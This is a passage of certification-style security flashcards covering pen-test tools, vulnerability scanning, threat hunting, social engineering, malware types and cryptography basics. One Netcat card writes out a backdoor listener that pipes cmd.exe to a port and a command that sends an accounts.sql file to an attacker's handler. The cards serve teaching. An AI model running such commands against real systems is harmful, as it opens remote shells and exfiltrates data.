is a framework designed for penetration test reporting and evidence gathering. It can integrate with other tools such as Metasploit and Nikto to run automated suites of tests. Results can be displayed as web reports. 
Term
fireELF 
Definition
injecting fileless exploit payloads into a Linux host (github.com/rek7/fireELF).
Term
RouterSploit 
Definition
vulnerability scanning and exploit modules targeting embedded systems 
Term
Browser Exploitation Framework (BeEF)— 
Definition
recovering web session information and exploiting client-side scripting 
Term
Zed Attack Proxy (ZAP)
Definition
scanning tools and scripts for web application and mobile app security testing 
Term
Pacu 
Definition
scanning and exploit tools for reconnaissance and exploitation of Amazon Web Service (AWS) accounts 
Term

NETCAT 

Definition
. Netcat is a computer networking utility for reading and writing raw data over a network connection and can be used for port scanning and fingerprinting. Netcat can also establish connections with remote machines.
Term

NETCAT 

Definition

the following command attempts to connect to the HTTP port on a server and return any banner by sending the "head" HTTP keyword:

 

echo "head" | nc 10.1.0.1 -v 80

 

Netcat can also establish connections with remote machines. To configure Netcat as a backdoor, you first set up a listener on the victim system (IP: 10.1.0.1) set to pipe traffic from a program, such as the command interpreter, to its handler:

nc -l -p 666 -e cmd.exe

 

The following command connects to the listener and grants access to the terminal:

nc 10.1.0.1 666

 

 

Used the other way around, Netcat can be used to receive files. For example, on the target system the attacker runs the following:

type accounts.sql | nc 10.1.0.192 6666

 

 

On the handler (IP 10.1.0.192), the attacker receives the file using the following command:

nc -l -p 6666 > accounts.sql

Term
Operating system (OS)
Definition
an application exploit will run with the permissions of the logged on user, which will hopefully be limited. A vulnerability in an OS kernel file or shared library is more likely to allow privilege escalation, where the malware code runs with higher access rights (system or root).
Term
Firmware 
Definition
vulnerabilities can exist in the BIOS/UEFI firmware that controls the boot process for PCs. There can also be bugs in device firmware, such as network cards and disk controllers. Finally, network appliances and Internet of Things (IoT) devices run OS code as a type of firmware. Like kernel vulnerabilities, firmware exploits can be difficult to identify, because the exploit code can run with the highest level of privilege. 
Term
zero-day
Definition
A vulnerability that is exploited before the developer knows about it or can release a patch is called a zero-day. These can be extremely destructive, as it can take the vendor some time to develop a patch, leaving systems vulnerable in the interim.

The term zero-day is usually applied to the vulnerability itself but can also refer to an attack or malware that exploits it.

Term

Default Settings 

Definition

Relying on the manufacturer default settings when deploying an appliance or software applications is one example of weak configuration. It is not sufficient to rely on the vendor to ship products in a default-secure configuration, though many now do. Default settings may leave unsecure interfaces enabled that allow an attacker to compromise the device. Network appliances with weak settings can allow attackers to move through the network unhindered and snoop on traffic.

Term

Unsecured Root Accounts  

Definition

The root account, referred to as the default Administrator account in Windows or generically as the superuser, has no restrictions set over system access. A superuser account is used to install the OS. An unsecured root account is one that an adversary is able to gain control of, either by guessing a weak password or by using some local boot attack to set or change the password. Software bugs can also allow root access,These vulnerabilities are extremely serious as they give the threat actor complete control of the system.

Effective user management and authorization policies should be enforced so that the superuser account is highly restricted and administration tasks are performed by least privilege management accounts or roles instead. The default root or Administrator account is usually disabled for login. Even if this type of account is enabled for local (interactive) login, it should not be accessible via remote login mechanisms.

Term

Open Ports and Services 
Some generic steps to harden services to meet a given role include

Definition

§  If the service is security-critical (such as a remote administration interface), restrict endpoints that are allowed to access the service by IP address or address range. Alternatively, prevent suspect endpoints from connecting by adding them to the block list, but otherwise allow access.

§  Disable services that are installed by default but that are not needed. Ideally, disable the service on the server itself, but in some circumstances it may be necessary to block the port using a firewall instead.

 

§  For services that should only be available on the private network, block access to ports at border firewalls or segment the network so that the servers cannot be accessed from external networks.

Term
Unsecure Protocols
Definition

An unsecure protocol is one that transfers data as cleartext; that is, the protocol does not use encryption for data protection. Lack of encryption also means that there is no secure way to authenticate the endpoints. This allows an attacker to intercept and modify communications, acting as man-in-the-middle (MITM).

Term

Weak Encryption 
Encryption algorithms protect data when it is stored on disk or transferred over a network. Encrypted data should only be accessible to someone with the correct decryption key. Weak encryption vulnerabilities allow unauthorized access to data.


Such vulnerabilities arise in the following circumstances:

Definition

§  The key is generated from a simple password, making it vulnerable to guessing attempts by brute-force enumeration (if the password is too short) or dictionary enumeration (if the password is not complex).

§  The algorithm or cipher used for encryption has known weaknesses that allow brute-force enumeration.

 

§  The key is not distributed securely and can easily fall into the hands of people who are not authorized to decrypt the data.

Term

Errors 

Definition

Weakly configured applications may display unformatted error messages under certain conditions. These error messages can be revealing to threat actors probing for vulnerabilities and coding mistakes. Secure coding practices should ensure that if an application fails, it does so "gracefully" without revealing information that could assist the development of an exploit. 

Term
data breach event  
Definition
data breach event is where confidential data is read, transferred, modified, or deleted without authorization. 
Term
privacy breach 
Definition
A privacy breach is where personal data is not collected, stored, or processed in full compliance with the laws or regulations governing personal information. 
Term
Data exfiltration  
Definition

§  is the methods and tools by which an attacker transfers data without authorization from the victim's systems to an external network or media. Unlike a data breach, a data exfiltration event is always intentional and malicious. Data exfiltration is a consequence of a data breach event.

Term

Identity Theft Impacts 

Definition

A privacy breach may allow the threat actor to perform identity theft or to sell the data to other malicious actors. The threat actor may obtain account credentials or might be able to use personal details and financial information to make fraudulent credit applications and purchases. 

Term
Data Loss and Availability Loss Impacts 
Definition

Compared to data breaches, data loss is where information becomes unavailable, either permanently or temporarily. Availability is sometimes overlooked as a security attribute compared to confidentiality and integrity, but it can have severe impacts on business workflows. If processing systems are brought down by accidental or malicious disaster events, a company may not be able to perform crucial workflows like order processing and fulfillment.

Term

Financial and Reputation Impacts 

Definition

All these impacts can have direct financial impacts due to damages, fines, and loss of business. Data/privacy breach and availability loss events will also cause a company's reputation to drop with direct customers. Major events might cause widespread adverse publicity on social media and mainstream media. In anticipation of these impacts, incident handling teams should include public relations (PR) and marketing expertise to minimize reputational damage.

Term
Vendor management  
Definition
is a process for selecting supplier companies and evaluating the risks inherent in relying on a third-party product or service. When it comes to data and cybersecurity, you must understand that risks cannot be wholly transferred to the vendor. If a data storage vendor suffers a data breach, you may be able to claim costs from them, but your company will still be held liable in terms of legal penalties and damage to reputation. If your webstore suffers frequent outages because of failures at a hosting provider, it is your company's reputation that will suffer and your company that will lose orders because customers look elsewhere.
Term

Data Storage 

Definition

§  Ensure the same protections for data as though it were stored on-premises, including authorization and access management and encryption.

§  Monitor and audit third-party access to data storage to ensure it is being used only in compliance with data sharing agreements and nondisclosure agreements.

 

§  Evaluate compliance impacts from storing personal data on a third-party system, such as a cloud provider or backup/archive management service.

Term

Cloud-Based versus On-Premises Risks 

Definition

On-premises risks refer to software vulnerabilities, weak configurations, and third-party issues arising from hosts, servers, routers, switches, access points, and firewalls located on a private network installed to private offices or campus buildings. Many companies use cloud services to fully or partly support business workflows. The third-party vendor management, code, and data storage risks discussed previously apply directly to cloud as well as to on-premises. Software and weak configuration risks can also apply, however. They are not the sole responsibility of the cloud service provider (CSP). Clouds operate a shared responsibility model. This means that the cloud service provider is responsible for the security of the cloud, while the cloud consumer is responsible for security in the cloud. The types of software and configuration vulnerabilities that you must assess and monitor vary according to the nature of the service.

Term

SP 800-115 identifies three principal activities within an assessment:

Definition

§  Testing the object under assessment to discover vulnerabilities or to prove the effectiveness of security controls.

§  Examining assessment objects to understand the security system and identify any logical weaknesses. This might highlight a lack of security controls or a common misconfiguration.

 

§  Interviewing personnel to gather information and probe attitudes toward and understanding of security.

Term
vulnerability assessment 
Definition
A vulnerability assessment is an evaluation of a system's security and ability to meet compliance requirements based on the configuration state of the system. Essentially, the vulnerability assessment determines if the current configuration matches the ideal configuration (the baseline).
Term

Network Vulnerability Scanner 

Definition

A network vulnerability scanner, such as Tenable Nessus  or OpenVAS

), is designed to test network hosts, including client PCs, mobile devices, servers, routers, and switches. It examines an organization's on-premises systems, applications, and devices and compares the scan results to configuration templates plus lists of known vulnerabilities. Typical results from a vulnerability assessment will identify missing patches, deviations from baseline configuration templates, and other related vulnerabilities. 

Term

Application and Web Application Scanners 

Definition

A dedicated application scanner is configured with more detailed and specific scripts to test for known attacks, as well as scanning for missing patches and weak configurations. The best known class of application scanners are web application scanners. Tools such as Nikto (cirt.net/Nikto2) look for known web exploits, such as SQL injection and cross-site scripting (XSS), and may also analyze source code and database security to detect unsecure programming practices. Other types of application scanners would be optimized for a particular class of software, such as a database server.

Term
vulnerability feed
Definition
An automated scanner needs to be kept up to date with information about known vulnerabilities. This information is often described as a vulnerability feed, though the Nessus tool refers to these feeds as plug-insand OpenVAS refers to them as network vulnerability tests (NVTs). 
Term
Secure Content Automation Protocol (SCAP) 
Definition

Vulnerability feeds make use of common identifiers to facilitate sharing of intelligence data across different platforms. Many vulnerability scanners use the Secure Content Automation Protocol (SCAP) to obtain feed or plug-in updates (scap.nist.gov). As well as providing a mechanism for distributing the feed, SCAP defines ways to compare the actual configuration of a system to a target-secure baseline plus various systems of common identifiers. These identifiers supply a standard means for different products to refer to a vulnerability or platform consistently.

Term
Common Vulnerabilities and Exposures (CVE) 
Definition
) is a dictionary of vulnerabilities in published operating systems and applications software. 
Term
Common Vulnerability Scoring System (CVSS)
Definition

The CVE dictionary provides the principal input for NIST's National Vulnerability Database

The NVD supplements the CVE descriptions with additional analysis, a criticality metric, calculated using the Common Vulnerability Scoring System (CVSS), plus fix information.


CVSS is maintained by the Forum of Incident Response and Security Teams

 

 CVSS metrics generate a score from 0 to 10 based on characteristics of the vulnerability, such as whether it can be triggered remotely or needs local access, whether user intervention is required, and so on. The scores are banded into descriptions too:

Term
 CVSS metrics  
Definition
[image]
Term
Scan intrusiveness 
Definition

Scan intrusiveness is a measure of how much the scanner interacts with the target. 

Term
Non-intrusive (or passive) scanning 
Definition

Non-intrusive (or passive) scanning means analyzing indirect evidence, such as the types of traffic generated by a device. A passive scanner, the Zeek Network Security Monitor (zeek.org) being one example, analyzes a network capture and tries to identify policy deviations or CVE matches. This type of scanning has the least impact on the network and on hosts, but is less likely to identify vulnerabilities comprehensively. Passive scanning might be used by a threat actor to scan a network stealthily.

Term
Active scanning 
Definition

means probing the device's configuration using some sort of network connection with the target. Active scanning consumes more network bandwidth and runs the risk of crashing the target of the scan or causing some other sort of outage. Agent-based scanning is also an active technique.

Term
non-credentialed scan
Definition

A non-credentialed scan is one that proceeds by directing test packets at a host without being able to log on to the OS or application. The view obtained is the one that the host exposes to an unprivileged user on the network. The test routines may be able to include things such as using default passwords for service accounts and device management interfaces, but they are not given privileged access. While you may discover more weaknesses with a credentialed scan, you sometimes will want to narrow your focus to think like an attacker who doesn't have specific high-level permissions or total administrative access. Non-credentialed scanning is often the most appropriate technique for external assessment of the network perimeter or when performing web application scanning.

Term
credentialed scan  
Definition

A credentialed scan is given a user account with logon rights to various hosts, plus whatever other permissions are appropriate for the testing routines. This sort of test allows much more in-depth analysis, especially in detecting when applications or security settings may be misconfigured. It also shows what an insider attack, or one where the attacker has compromised a user account, may be able to achieve. A credentialed scan is a more intrusive type of scan than non-credentialed scanning.


Create dedicated network accounts for use by the vulnerability scanner only. Ensure that the credentials for these accounts are stored securely on the scan server

Term

false positive 

Definition
false positive is something that is identified by a scanner or other assessment tool as being a vulnerability, when in fact it is not
Term
false negatives 
Definition

You should also be alert to the possibility of false negativesthat is, potential vulnerabilities that are not identified in a scan. This risk can be mitigated somewhat by running repeat scans periodically and by using scanners from more than one vendor. Also, because automated scan plug-ins depend on pre-compiled scripts, they do not reproduce the success that a skilled and determined hacker might be capable of and can therefore create a false sense of security.

Term

Security content automation protocol (SCAP) allows compatible scanners to determine whether a computer meets a configuration baseline.
SCAP uses several components to accomplish this function, but some of the most important are:

Definition

§  Open Vulnerability and Assessment Language (OVAL)—an XML schema for describing system security state and querying vulnerability reports and information.

 

§  Extensible Configuration Checklist Description Format (XCCDF)—an XML schema for developing and auditing best-practice configuration checklists and rules. Previously, best-practice guides might have been written in prose for system administrators to apply manually. XCCDF provides a machine-readable format that can be applied and validated using compatible software.

Term
compliance scan
Definition

Some scanners measure systems and configuration settings against best practice frameworks. This is referred to as a compliance scan. This might be necessary for regulatory compliance or you might voluntarily want to conform to externally agreed standards of best practice.

Term

THREAT HUNTING 

Definition

Where vulnerability scanning uses lists of patches and standard definitions of baseline configurations, threat hunting is an assessment technique that utilizes insights gained from threat intelligence to proactively discover whether there is evidence of TTPs already present within the network or system.

Where a pen test attempts to achieve some sort of system intrusion or concrete demonstration of weakness, threat hunting is based only on analysis of data within the system. To that extent, it is less potentially disruptive than pen testing.

Term

Threat Hunting general points to observe 

Definition

§  Advisories and bulletinsthreat hunting is a labor-intensive activity and so needs to be performed with clear goals and resources. Threat hunting usually proceeds according to some hypothesis of possible threat. Security bulletins and advisories from vendors and security researchers about new TTPs and/or vulnerabilities may be the trigger for establishing a threat hunt. For example, if threat intelligence reveals that Windows desktops in many companies are being infected with a new type of malware that is not being blocked by any current malware definitions, you might initiate the following threat-hunting plan to detect whether the malware is also infecting your systems.

Intelligence fusion and threat datathreat hunting can be performed by manual analysis of network and log data, but this is a very lengthy process. An organization with a security information and event management (SIEM) and threat analytics platform can apply intelligence fusion techniques. The analytics platform is kept up to date with a TTP and IoC threat data feed. Analysts can develop queries and filters to correlate threat data against on-premises data from network traffic and logs. This process may also be partially or wholly automated using AI-assisted analysis and correlation.

  • Maneuverwhen investigating a suspected live threat, you must remember the adversarial nature of hacking. A capable threat actor is likely to have anticipated the likelihood of threat hunting, and attempted to deploy countermeasures to frustrate detection. For example, the attacker may trigger a DDoS attack to divert the security team's attention, and then attempt to accelerate plans to achieve actions on objectives. Maneuver is a military doctrine term relating to obtaining positional advantage (ccdcoe.org/uploads/2012/01/3_3_Applegate_ThePrincipleOfManeuverInCyberOperations.pdf). As an example of defensive maneuver, threat hunting might use passive discovery techniques so that threat actors are given no hint that an intrusion has been discovered before the security team has a containment, eradication, and recovery plan.
Term
penetration test
Definition

penetration test—often shortened to pen test—uses authorized hacking techniques to discover exploitable weaknesses in the target's security systems. Pen testing is also referred to as ethical hacking. 

Term
A pen test might involve the following steps:
Definition

§  Verify a threat existsuse surveillance, social engineering, network scanners, and vulnerability assessment tools to identify a vector by which vulnerabilities could be exploited.

§  Bypass security controlslook for easy ways to attack the system. For example, if the network is strongly protected by a firewall, is it possible to gain physical access to a computer in the building and run malware from a USB stick?

§  Actively test security controlsprobe controls for configuration weaknesses and errors, such as weak passwords or software vulnerabilities.

 

§  Exploit vulnerabilitiesprove that a vulnerability is high risk by exploiting it to gain access to data or install backdoors.

Term
Rules of engagement 
Definition

Security assessments might be performed by employees or may be contracted to consultants or other third parties. Rules of engagement specify what activity is permitted or not permitted. These rules should be made explicit in a contractual agreement. For example, a pen test should have a concrete objective and scope rather than a vague type of "Break into the network" aim. There may be systems and data that the penetration tester should not attempt to access or exploit. Where a pen test involves third-party services (such as a cloud provider), authorization to conduct the test must also be sought from the third party.

Term
Black box (or unknown environment)
Definition

the consultant is given no privileged information about the network and its security systems. This type of test would require the tester to perform a reconnaissance phase. Black box tests are useful for simulating the behavior of an external threat.

Term
White box (or known environment)
Definition

the consultant is given complete access to information about the network. This type of test is sometimes conducted as a follow-up to a black box test to fully evaluate flaws discovered during the black box test. The tester skips the reconnaissance phase in this type of test. White box tests are useful for simulating the behavior of a privileged insider threat.

Term
Gray box 
Definition

(or partially known environment)—the consultant is given some information; typically, this would resemble the knowledge of junior or non-IT staff to model particular types of insider threats. This type of test requires partial reconnaissance on the part of the tester. Gray box tests are useful for simulating the behavior of an unprivileged insider threat.

Term
blind (or single-blind) test
double-blind test
Definition

A test where the attacker has no knowledge of the system but where staff are informed that a test will take place is referred to as a blind (or single-blind) test. A test where staff are not made aware that a pen test will take place is referred to as a double-blind test.

Term
Bug Bounty 
Definition
bug bounty is a program operated by a software vendor or website operator where rewards are given for reporting vulnerabilities. Where a pen test is performed on a contractual basis, costed by the consultant, a bug bounty program is a way of crowd sourcing detection of vulnerabilities. Some bug bounties are operated as internal programs, with rewards for employees only. Most are open to public submissions
Term
Red team 
Definition

§  performs the offensive role to try to infiltrate the target.

Term
Blue team 
Definition

performs the defensive role by operating monitoring and alerting controls to detect and prevent the infiltration.

Term
white team 
Definition

There will also often be a white team, which sets the rules of engagement and monitors the exercise, providing arbitration and guidance, if necessary. If the red team is third party, the white team will include a representative of the consultancy company. One critical task of the white team is to halt the exercise should it become too risky. For example, an actual threat actor may attempt to piggyback a backdoor established by the red team.

Term
purple team
Definition

In a purple team exercise, the red and blue teams meet for regular debriefs while the exercise is ongoing. The red team might reveal where they have been successful and collaborate with the blue team on working out a detection mechanism. This process might be assisted by purple team members acting as facilitators. The drawback of a purple team exercise is that without blind or double-blind conditions, there is no simulation of a hostile adversary and the stresses of dealing with that.

Term
Passive reconnaissance 
Definition
is not likely to alert the target of the investigation as it means querying publicly available information. 
Term
Active reconnaissance  
Definition

has more risk of detection. Active techniques might involve gaining physical access to premises or using scanning tools on the target's web services and other networks.

Term
Persistence 
Definition

the tester's ability to reconnect to the compromised host and use it as a remote access tool (RAT) or backdoor. To do this, the tester must establish a command and control (C2 or C&C) network to use to control the compromised host, upload additional attack tools, and download exfiltrated data. The connection to the compromised host will typically require a malware executable to run after shut down/log off events and a connection to a network port and the attacker's IP address to be available.

Term
Privilege escalation
Definition

persistence is followed by further reconnaissance, where the pen tester attempts to map out the internal network and discover the services running on it and accounts configured to access it. Moving within the network or accessing data assets are likely to require higher privilege levels. For example, the original malware may have run with local administrator privileges on a client workstation or as the Apache user on a web server. Another exploit might allow malware to execute with system/root privileges, or to use network administrator privileges on other hosts, such as application servers.

Term
Lateral movement 
Definition

gaining control over other hosts. This is done partly to discover more opportunities to widen access (harvesting credentials, detecting software vulnerabilities, and gathering other such "loot"), partly to identify where valuable data assets might be located, and partly to evade detection. Lateral movement usually involves executing the attack tools over remote process shares or using scripting tools, such as PowerShell.

Term
Pivoting 
Definition

hosts that hold the most valuable data are not normally able to access external networks directly. If the pen tester achieves a foothold on a perimeter server, a pivot allows them to bypass a network boundary and compromise servers on an inside network. A pivot is normally accomplished using remote access and tunneling protocols, such as Secure Shell (SSH), virtual private networking (VPN), or remote desktop.

Term
Actions on Objectives 
Definition

for a threat actor, this means stealing data from one or more systems (data exfiltration). From the perspective of a pen tester, it would be a matter of the scope definition whether this would be attempted. In most cases, it is usually sufficient to show that actions on objectives could be achieved.

Term
Cleanup 
Definition
for a threat actor, this means removing evidence of the attack, or at least evidence that could implicate the threat actor. For a pen tester, this phase means removing any backdoors or tools and ensuring that the system is not less secure than the pre-engagement state.
Term
. Social engineering  
Definition

Social engineering refers to means of either eliciting information from someone or getting them to perform some action for the threat actor. It can also be referred to as "hacking the human." Social engineering might be used to gather intelligence as reconnaissance in preparation for an intrusion, or it might be used to effect an actual intrusion.

Term
Impersonation
Definition
Impersonation simply means pretending to be someone else. It is one of the basic social engineering techniques. Impersonation can use either a non-intimidating or intimidating approach and follow one or more social engineering principals like confidence, consensus, familiarity, urgency, and scarcity. Impersonation is possible where the target cannot verify the attacker's identity easily, such as over the phone or via an email message.
Term

Dumpster Diving

Definition

Dumpster diving refers to combing through an organization's (or individual's) garbage to try to find useful documents (or even files stored on discarded removable media).

Term
Tailgating  
Definition
Tailgating is a means of entering a secure area without authorization by following close behind the person that has been allowed to open the door or checkpoint. 
Term

Piggy backing 

Definition
Piggy backing is a similar situation, but means that the attacker enters a secure area with an employee's permission.
Term
Identity fraud 
Definition
Identity fraud is a specific type of impersonation where the attacker uses specific details of someone's identity. A typical consumer identity fraud is using someone else's name and address to make a loan application or using stolen credit card details to start a mobile phone contract.
Term
Credential databases
Definition

account details from previous attacks are widely available (haveibeenpwned.com). An attacker can try to match a target in one of these databases and hope that they have reused a password. The attacker could also leverage third-party sites for impersonation. For example, rather than using a work account, they could gain control of a social media account.

Term
Shoulder surfing
Definition

a threat actor can learn a password or PIN (or other secure information) by watching the user type it. Despite the name, the attacker may not have to be in close proximity to the target—they could use high-powered binoculars or CCTV to directly observe the target remotely.

Term
Lunchtime attacks
Definition

most authentication methods are dependent on the physical security of the workstation. If a user leaves a workstation unattended while logged on, an attacker can physically gain access to the system. This is often described as a lunchtime attack. Most operating systems are set to activate a password-protected screen saver after a defined period of no keyboard or mouse activity. Users should also be trained to lock or log off the workstation whenever they leave it unattended.

Term
Phishing 
Definition

Phishing is a combination of social engineering and spoofing. It persuades or tricks the target into interacting with a malicious resource disguised as a trusted one, traditionally using email as the vector. A phishing message might try to convince the user to perform some action, such as installing disguised malware or allowing a remote access connection by the attacker.

Term
Spear phishing 
Definition

a phishing scam where the attacker has some information that makes an individual target more likely to be fooled by the attack. Each phishing message is tailored to address a specific target user. The attacker might know the name of a document that the target is editing, for instance, and send a malicious copy, or the phishing email might show that the attacker knows the recipient's full name, job title, telephone number, or other details that help convince the target that the communication is genuine.

Term
Whaling 
Definition
a spear phishing attack directed specifically against upper levels of management in the organization (CEOs and other "big fish"). Upper management may also be more vulnerable to ordinary phishing attacks because of their reluctance to learn basic security procedures. 
Term
Vishing 
Definition

§  a phishing attack conducted through a voice channel (telephone or VoIP, for instance). For example, targets could be called by someone purporting to represent their bank asking them to verify a recent credit card transaction and requesting their security details. It can be much more difficult for someone to refuse a request made in a phone call compared to one made in an email. 

Term
SMiShing 
Definition

§  this refers to using short message service (SMS) text communications as the vector.

 

 

Term
spam 
Definition

Unsolicited email, or spam, is used as the vector for many attacks. Threat actors harvest email addresses from marketing lists or databases of historic privacy breaches, or might try to target every email address at a certain company. Mass mail attacks could also be perpetrated over any type of instant messaging or Internet messaging service (SPIM).

Term
Hoaxes 
Definition

Hoaxes, such as security alerts or chain emails, are another common social engineering technique, often combined with phishing attacks. An email alert or web pop-up will claim to have identified some sort of security problem, such as virus infection, and offer a tool to fix the problem. The tool of course will be some sort of Trojan application.

Term
prepending  
Definition

prepending means adding text that appears to have been generated by the mail system. For example, an attacker may add "RE:" to the subject line to make it appear as though the message is a reply or may add something like "MAILSAFE: PASSED" to make it appear as though a message has been scanned and accepted by some security software.

Term
Pharming  
Definition

Pharming is a passive means of redirecting users from a legitimate website to a malicious one. Rather than using social engineering techniques to trick the user, pharming relies on corrupting the way the victim's computer performs Internet name resolution, so that they are redirected from the genuine site to the malicious one. For example, if mybank.foo should point to the IP address 2.2.2.2, a pharming attack would corrupt the name resolution process to make it point to IP address 6.6.6.6. 

Term

Typosquatting 

Definition

Rather than redirection, a threat actor might use typosquatting. This means that the threat actor registers a domain name that is very similar to a real one, such as connptia.org, hoping that users will not notice the difference. These are also referred to as cousin, lookalike, or doppelganger domains. Typosquatting might be used for pharming and phishing attacks. Another technique is to register a hijacked subdomain using the primary domain of a trusted cloud provider, such as onmicrosoft.com. If a phishing message appears to come from comptia.onmicrosoft.com, many users will be inclined to trust it. 

Term

Watering Hole Attack 

Definition
watering hole attack is another passive technique where the threat actor does not have to risk communicating directly with the target. It relies on the circumstance that a group of targets may use an unsecure third-party website.
Term

Credential Harvesting 

Definition
Within the general realm of phishing and pharming, credential harvesting is a campaign specifically designed to steal account credentials. The attacker may have more interest in selling the database of captured logins than trying to exploit them directly.
Term
influence campaign 
Definition
An influence campaign is a major program launched by an adversary with a high level of capability, such as a nation-state actor, terrorist group, or hacktivist group. The goal of an influence campaign is to shift public opinion on some topic
Term
Viruses and worms 
Definition

these represent some of the first types of malware and spread without any authorization from the user by being concealed within the executable code of another process.The earliest types of malware infect executable files on disk (virus) or in memory (worm). This type of malware is primarily designed to replicate, but may drop any type of payload.

 

Term
Trojan 
Definition
malware concealed within an installer package for software that appears to be legitimate. This type of malware does not seek any type of consent for installation and is actively designed to operate secretly.
Term
Potentially unwanted programs (PUPs)/Potentially unwanted applications (PUAs)
Definition
software installed alongside a package selected by the user or perhaps bundled with a new computer system. Unlike a Trojan, the presence of a PUP is not automatically regarded as malicious. It may have been installed without active consent or consent from a purposefully confusing license agreement. This type of software is sometimes described as grayware rather than malware.
Term
Non-resident/file infector 
Definition

the virus is contained within a host executable file and runs with the host process. The virus will try to infect other process images on persistent storage and perform other payload actions. It then passes control back to the host program.

Term
Memory resident 
Definition

when the host file is executed, the virus creates a new process for itself in memory. The malicious process remains in memory, even if the host process is terminated.

Term
Boot 
Definition

the virus code is written to the disk boot sector or the partition table of a fixed disk or USB media, and executes as a memory resident process when the OS starts or the media is attached to the computer.

Term
Script and macro viruses 
Definition

the malware uses the programming features available in local scripting engines for the OS and/or browser, such as PowerShell, Windows Management Instrumentation (WMI), JavaScript, Microsoft Office documents with Visual Basic for Applications (VBA) code enabled, or PDF documents with JavaScript enabled.

Term
Fileless malware
Definition

§  Fileless malware does not write its code to disk. The malware uses memory resident techniques to run in its own process, within a host process or dynamic link library (DLL), or within a scripting host. This does not mean that there is no disk activity at all, however. The malware may change registry values to achieve persistence (executing if the host computer is restarted). The initial execution of the malware may also depend on the user running a downloaded script, file attachment, or Trojan software package.

§  Fileless malware uses lightweight shellcode to achieve a backdoor mechanism on the host. The shellcode is easy to recompile in an obfuscated form to evade detection by scanners. It is then able to download additional packages or payloads to achieve the actor's actions and/or objectives. These packages can also be obfuscated, streamed, and compiled on the fly to evade automated detection.

 

§  Fileless malware may use "live off the land" techniques rather than compiled executables to evade detection. This means that the malware code uses legitimate system scripting tools, notably PowerShell and Windows Management Instrumentation (WMI), to execute payload actions. If they can be executed with sufficient permissions, these environments provide all the tools the attacker needs to perform scanning, reconfigure settings, and exfiltrate data.

Term
Tracking cookies
Definition
A cookie is a plaintext file, not malware, but if permitted by browser settings, third-party cookies can be used to record pages visited, the user's IP address and various other metadata, such as search queries and information about the browser software.
Term
Adware 
Definition

this is a class of PUP/grayware that performs browser reconfigurations, such as allowing tracking cookies, changing default search providers, opening sponsor's pages at startup, adding bookmarks, and so on. Adware may be installed as a program or as a browser extension/plug-in.

Term
 
Definition

§  this is malware that can perform adware-like tracking, but also monitor local application activity, take screenshots, and activate recording devices, such as a microphone or webcam. Another spyware technique is to perform Domain Name Service (DNS) redirection to pharming sites.

Term
keylogger  
Definition

§  keylogger is spyware that actively attempts to steal confidential information by recording keystrokes. The attacker will usually hope to discover passwords or credit card data.

Term
Any type of access method to a host that circumvents the usual authentication method and gives the remote user administrative control can be referred to as a backdoor
Definition
backdoor 
Term
remote access trojan (RAT) 
Definition
remote access trojan (RAT) is backdoor malware that mimics the functionality of legitimate remote control programs, but is designed specifically to operate covertly. Once the RAT is installed, it allows the threat actor to access the host, upload files, and install software or use "live off the land" techniques to effect further compromises. 
Term
bot  
botnet 
Definition

A compromised host can be installed with one or more bots. A bot is an automated script or tool that performs some malicious activity. A group of bots that are all under the control of the same malware instance can be manipulated as a botnet by the herder program. A botnet can be used for many types of malicious purpose, including triggering distributed denial of service (DDoS) attacks, launching spam campaigns, or performing cryptomining.

Term
rootkit 
Definition
Malware running with this level of privilege is referred to as a rootkit. The term derives from UNIX/Linux where any process running as root has unrestricted access to everything from the root of the file system down. 
Term
Ransomware  
Definition

Ransomware is a type of malware that tries to extort money from the victim. One class of ransomware will display threatening messages, such as requiring Windows to be reactivated or suggesting that the computer has been locked by the police because it was used to view child pornography or for terrorism. This may apparently block access to the file system by installing a different shell program, but this sort of attack is usually relatively simple to fix.

Term
logic bomb 
Definition
Some types of malware do not trigger automatically. Having infected a system, they wait for a pre-configured time or date (time bomb) or a system or user event (logic bomb). A logic bomb isn't necessarily malicious code but could be an event that triggers an undesirable event.
Term
sandbox 
Definition
sandbox is a system configured to be completely isolated from its host so that the malware cannot "break out." The sandbox will be designed to record file system and registry changes plus network activity 
Term
abnormal process behavior 
Definition
Because shellcode is easy to obfuscate, it can often evade signature-based A-V products. Threat hunting and security monitoring must use behavioral-based techniques to identify infections. This means close analysis of the processes running in system memory on a host. To perform abnormal process behavior analysis effectively, you should build up a sense of what is "normal" in a system and spot deviations in a potentially infected system
Term
Sysinternals 
Definition

is a suite of tools designed to assist with troubleshooting issues with Windows, and many of the tools are suited to investigating security issues. The Sysinternals tool Process Explorer is an enhanced version of Task Manager. You can view extra information about each process and better understand how processes are created in parent/child relationships.

Term
cipher 
Definition
cipher is a particular operation performed to encode or decode data. 
Term
Plaintext (or cleartext)
Definition

§  an unencrypted message. 

Term
Ciphertext 
Definition
an encrypted message. 
Term
Cryptanalysis 
Definition
the art of cracking cryptographic systems. 
Term
Cryptography 
Definition
(literally meaning "secret writing") It is the art of making information secure by encoding it.
Term
Hashing 
Definition

Hashing is the simplest type of cryptographic operation. A cryptographic hashing algorithm produces a fixed length string from an input plaintext that can be of any length. The output can be referred to as a checksum, message digest, or hash. The function is designed so that it is impossible to recover the plaintext data from the digest (one-way) and so that different inputs are unlikely to produce the same output (with a reduced chance of a collision).

A hashing algorithm is used to prove integrity.

a hash of a file can be used to verify the integrity of that file after transfer. 

Term

There are two popular implementations hash algorithms:

Definition

§  Secure Hash Algorithm (SHA)considered the strongest algorithm. There are variants that produce different-sized outputs, with longer digests considered more secure. The most popular variant is SHA-256, which produces a 256-bit digest.

§  Message Digest Algorithm #5 (MD5)produces a 128-bit digest. MD5 is not considered to be quite as safe for use as SHA-256, but it might be required for compatibility between security products.

Term
stream ciphers  
Definition

In a stream cipher, each byte or bit of data in the plaintext is encrypted one at a time. This is suitable for encrypting communications where the total length of the message is not known. The plaintext is combined with a separate randomly generated message, calculated from the key and an initialization vector (IV). The IV ensures the key produces a unique ciphertext from the same plaintext. The keystream must be unique, so an IV must not be reused with the same key. The recipient must be able to generate the same keystream as the sender and the streams must be synchronized. Stream ciphers might use markers to allow for synchronization and retransmission. Some types of stream ciphers are made self-synchronizing.

Term
stream cipher 
Definition
In a stream cipher, each byte or bit of data in the plaintext is encrypted one at a time.
Term
block cipher 
Definition
In a block cipher, the plaintext is divided into equal-size blocks (usually 128-bit).
Term
Advanced Encryption Standard (AES) 
(BLOCK CIPHER)
Definition

The Advanced Encryption Standard (AES) is the default symmetric encryption cipher for most products. Basic AES has a key size of 128 bits, but the most widely used variant is AES256, with a 256-bit key.  

Term
symmetric encryption cipher 
Definition
